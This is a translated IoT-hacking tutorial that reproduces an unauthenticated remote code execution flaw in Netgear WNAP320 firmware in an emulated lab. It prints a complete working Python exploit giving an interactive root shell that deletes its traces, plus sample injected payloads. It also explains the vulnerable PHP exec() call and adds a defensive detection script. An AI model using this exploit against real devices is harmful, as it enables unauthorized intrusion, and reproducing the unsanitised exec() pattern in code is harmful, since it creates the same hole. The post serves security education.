[Zero Basis to Learn IoT Pwn] Reproducing the Netgear WNAP320 RCE
0x00 Preface:
This is the second part of [Zero Basis to Learn IoT Pwn]. In the previous article we set up the emulation environment and got the Netgear WNAP320 firmware running in it, so this time we go straight into practice and learn from scratch by doing, haha.
0x01 Bug search:
There are many ways to search for bugs, for example online sites such as https://www.exploit-db.com/, or simply searching Baidu for the router model. Here I use searchsploit to search.
You can see that there is a matching bug, a macAddress remote code execution, and that a corresponding POC exists.
0x02 POC analysis:
The POC is as follows:
# Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)
# Vulnerability: Remote Command Execution on /boardDataWW.php macAddress parameter
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# IoT Device: Netgear WNAP320 Access Point
# Version: WNAP320 Access Point Firmware v2.0.3
import requests
import sys

if(len(sys.argv) != 2):
    print('Must specify the IP parameter')
    print("eg: python3 wnap320_v2_0_3.py <IP>")
    sys.exit(0)

host = sys.argv[1]
port = 80
cmd = ''
while(True):
    cmd = input('Shell_CMD$ ')
    #injecting system command part writing the command output to a output file
    data = {
        'macAddress' : '112233445566;' + cmd + ' > ./output #',
        'reginfo' : '0',
        'writeData' : 'Submit'
    }
    url = 'http://' + host + '/boardDataWW.php'
    response = requests.post(url, data=data)
    if(response.ok):
        #read the command output result
        url = 'http://' + host + '/output'
        cmdOutput = requests.get(url)
        print(cmdOutput.text)
        #remove trace
        cmd = 'rm ./output'
        data = {
            'macAddress' : '112233445566;' + cmd + ' #',
            'reginfo' : '0',
            'writeData' : 'Submit'
        }
        url = 'http://' + host + '/boardDataWW.php'
        response = requests.post(url, data=data)
    else:
        print('[!] No response from the server.')
The result of running it is as follows (you can successfully get a shell, and it has root privileges):
Next, let's analyze this POC in detail.
Code analysis
First look at this section. Here input() accepts the command typed by the user, and data is a dictionary of form fields sent in the POST body. Normally it should be macAddress: the MAC address, reginfo: 0, writeData: Submit. But because the page has a command injection flaw, we can inject a command into macAddress, which leads to arbitrary command execution.
cmd = input('Shell_CMD$ ')
#injecting system command part writing the command output to a output file
data = {
    'macAddress' : '112233445566;' + cmd + ' > ./output #',
    'reginfo' : '0',
    'writeData' : 'Submit'
}
# With cmd = 'whoami' the dictionary that is sent looks like this:
{
    'macAddress': '112233445566;whoami > ./output #',  # the semicolon chains the command and its output is redirected to the output file
    'reginfo' : '0',
    'writeData' : 'Submit'
}
Next, analyze this fragment. You can see that the vulnerability is in the page http://192.168.0.100/boardDataWW.php. Python sends the packet with POST, then requests the output file the command wrote to (its contents are printed on the command line), and finally triggers the vulnerability once more to delete the output file that echoed the result. That completes one round of remote code execution.
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
if(response.ok):
    #read the command output result
    url = 'http://' + host + '/output'
    cmdOutput = requests.get(url)
    print(cmdOutput.text)
    #remove trace
    cmd = 'rm ./output'
    data = {
        'macAddress' : '112233445566;' + cmd + ' #',
        'reginfo' : '0',
        'writeData' : 'Submit'
    }
    url = 'http://' + host + '/boardDataWW.php'
    response = requests.post(url, data=data)
else:
    print('[!] No response from the server.')
0x03 Manual reproduction:
http://192.168.0.100/boardDataWW.php can be accessed directly without logging in to the router, so this router is vulnerable to unauthenticated RCE.
Fill in any data here, then capture the request with Burp and take a look.
Here the web front end checks the format of the MAC address; the expected format is 112233445566.
The packet format is as follows:
Now manually test the command execution bug.
0x04 Vulnerability principle:
First we take the boardDataWW.php file from the firmware package, then analyze its source code.
The first part is the HTML in the PHP file. It contains a form with a text box named macAddress whose content comes from user input. When the Submit button is clicked, the checkMAC function is called.
<body align="center">
  <form name="hiddenForm" action="boardDataWW.php" method="post" align="center">
    <td width="70%">
      <input type="text" id="macAddress" name="macAddress" label="MAC Address" value="<?php echo $_REQUEST['macAddress'] ?>" onasdf="checkMAC(this.value);">
      <small>* Format: xxxxxxxxxxxx (x = Hex String)</small>
    </td>
    <td width="30%" class="right">
      <input type="submit" name="writeData" value="Submit" onclick="checkMAC(event, document.getElementById('macAddress').value);">
    </td>
    <td width="70%"><input type="reset" name="reset" value="Reset Form"></td>
  </form>
</body>
The main job of checkMAC is to check whether the MAC address entered by the user has the correct format: exactly 12 characters, each a hexadecimal digit or letter.
<html>
<head>
  <title>Netgear</title>
  <script type="text/javascript">
  <!--
  function checkMAC(eventobj,mac) {
    if (!(/^[0-9A-Fa-f]{12,12}$/.test(mac))) {
      .....
  }
  </script>
</head>
</html>
The following PHP code is executed after the form is submitted. It first checks the request: whether writeData is non-empty; if so, it checks whether the macAddress data is non-empty and whether reginfo is non-empty, and then whether the MAC address format is correct. If all these conditions hold, it enters the branch and runs the next piece of code. Note that the server-side ereg() pattern is not anchored with ^ and $, so it only requires twelve hex characters to appear somewhere in the value; a payload such as 112233445566;whoami > ./output # therefore passes it.
Then comes the code that causes the vulnerability: the call to PHP's exec function.
<?php
$flag=false;
$msg='';
if (!empty($_REQUEST['writeData'])) {
    // Check the format of the macAddress input, e.g. that it contains a [0-9a-fA-F] string.
    if (!empty($_REQUEST['macAddress']) && array_search($_REQUEST['reginfo'],Array('WW'=>'0','NA'=>'1'))!==false && ereg("[0-9a-fA-F]{12,12}",$_REQUEST['macAddress'],$regs)!==false)
    {
        // macAddress is concatenated directly into the command, so there is a command injection vulnerability!
        exec("wr_mfg_data -m ".$_REQUEST['macAddress']." -c ".$_REQUEST['reginfo'],$dummy,$res);
        if ($res==0) {
            conf_set_buffer("system:basicSettings:apName netgear".substr($_REQUEST['macAddress'], -6)."\n");
            conf_save();
            $msg = 'Update Success!';
            $flag = true;
        }
    }
    else
        $flag = true;
}
?>
It then calls exec to run "wr_mfg_data -m ".$_REQUEST['macAddress']." -c ".$_REQUEST['reginfo']. Here you can see that the user input is concatenated into the command string and executed as a command, which is what produces the command injection vulnerability.
wr_mfg_data is the program that changes the MAC address.
When we inject into the MAC address, we use a semicolon to append an extra command, and both commands are executed.
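As an added example (my own code, not from the original post or the Netgear firmware), the following Python puts the two checks side by side: the server-side ereg() pattern above is unanchored, so the injected value passes it, while an anchored match rejects anything but twelve hex digits. The flag_injection_attempts() helper and the captured POST bodies are constructed for illustration, the kind of thing a defender would run over proxy or IDS captures of requests to boardDataWW.php.

```python
import re
from urllib.parse import parse_qs

# Mirrors the server-side ereg() pattern from the vulnerable PHP (unanchored).
WEAK_MAC_RE = re.compile(r"[0-9a-fA-F]{12,12}")
# What the check should have been: the whole value is exactly 12 hex digits.
STRICT_MAC_RE = re.compile(r"^[0-9a-fA-F]{12}$")
ALLOWED_REGINFO = {"0", "1"}  # Array('WW'=>'0','NA'=>'1') in the PHP


def weak_check(mac: str, reginfo: str) -> bool:
    """Reproduces the vulnerable PHP condition; True means exec() would be reached."""
    return bool(mac) and reginfo in ALLOWED_REGINFO and WEAK_MAC_RE.search(mac) is not None


def strict_check(mac: str, reginfo: str) -> bool:
    """Hardened condition: anchored match, so shell metacharacters cannot slip through."""
    return reginfo in ALLOWED_REGINFO and STRICT_MAC_RE.fullmatch(mac) is not None


def flag_injection_attempts(post_bodies):
    """Return macAddress values from captured POST bodies to boardDataWW.php that
    pass the weak check but fail the strict one, i.e. likely injection attempts."""
    flagged = []
    for body in post_bodies:
        fields = parse_qs(body, keep_blank_values=True)
        mac = fields.get("macAddress", [""])[0]
        reginfo = fields.get("reginfo", [""])[0]
        if weak_check(mac, reginfo) and not strict_check(mac, reginfo):
            flagged.append(mac)
    return flagged


# Constructed sample of captured request bodies (hypothetical proxy/IDS log).
SAMPLE_BODIES = [
    "macAddress=112233445566&reginfo=0&writeData=Submit",                      # legitimate
    "macAddress=112233445566%3Bwhoami+%3E+.%2Foutput+%23&reginfo=0&writeData=Submit",  # injected
    "macAddress=zz&reginfo=0&writeData=Submit",                                # rejected by both
    "macAddress=112233445566&reginfo=WW&writeData=Submit",                     # bad reginfo
]

if __name__ == "__main__":
    for mac in flag_injection_attempts(SAMPLE_BODIES):
        print("suspicious macAddress:", repr(mac))
```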
0x05 PWN newbie group
Welcome to join the group to discuss PWN skills and RE (reverse engineering).